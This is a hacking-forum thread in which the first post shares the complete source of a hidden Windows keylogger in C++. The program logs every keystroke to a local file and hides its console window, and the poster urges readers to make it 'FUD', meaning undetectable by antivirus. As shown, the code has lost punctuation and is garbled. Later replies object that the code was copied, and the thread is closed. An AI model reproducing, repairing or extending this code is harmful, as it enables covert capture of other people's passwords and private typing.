Login Register






Thread Rating:
  • 0 Vote(s) - 0 Average
Thread Closed 


C++ Keylogger source code filter_list
Author
Message
C++ Keylogger source code #1
This is C++ code for Keylogger

PHP Code:
#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_strokechar *file);
void Stealth();

int main()
{
Stealth();
char i;

while (
1)
{
for(
8<= 190i++)
{
if (
GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 
0;
}

/* *********************************** */

int Save (int key_strokechar *file)
{
if ( (
key_stroke == 1) || (key_stroke == 2) )
return 
0;

FILE *OUTPUT_FILE;
OUTPUT_FILE fopen(file"a+");

cout << key_stroke << endl;

if (
key_stroke == 8)
fprintf(OUTPUT_FILE"%s""[BACKSPACE]");
else if (
key_stroke == 13)
fprintf(OUTPUT_FILE"%s""\n");
else if (
key_stroke == 32)
fprintf(OUTPUT_FILE"%s"" ");
else if (
key_stroke == VK_TAB)
fprintf(OUTPUT_FILE"%s""[TAB]");
else if (
key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE"%s""[SHIFT]");
else if (
key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE"%s""[CONTROL]");
else if (
key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE"%s""[ESCAPE]");
else if (
key_stroke == VK_END)
fprintf(OUTPUT_FILE"%s""[END]");
else if (
key_stroke == VK_HOME)
fprintf(OUTPUT_FILE"%s""[HOME]");
else if (
key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE"%s""[LEFT]");
else if (
key_stroke == VK_UP)
fprintf(OUTPUT_FILE"%s""[UP]");
else if (
key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE"%s""[RIGHT]");
else if (
key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE"%s""[DOWN]");
else if (
key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE"%s"".");
else
fprintf(OUTPUT_FILE"%s", &key_stroke);

fclose (OUTPUT_FILE);
return 
0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth FindWindowA("ConsoleWindowClass"NULL);
ShowWindow(Stealth,0);


Credits: Google :wink:

You can also work on this to make a FUD :dance:


RE: Learn To create Keylogger using C++ #2
How can this be a tutorial you haven't explained a single word , and this is a copied code that has already been posted here have a look at the links :-
http://www.hackcommunity.com/Thread-Keyl...rce-code-C
http://www.hackcommunity.com/Thread-How-...er-using-C

have a look in the forum before you post any article. Don't post duplicate threads you might get warning
[Image: OilyCostlyEwe.gif]


RE: Learn To create Keylogger using C++ #3
Closed!
[Image: fow57.jpg]








Users browsing this thread: 1 Guest(s)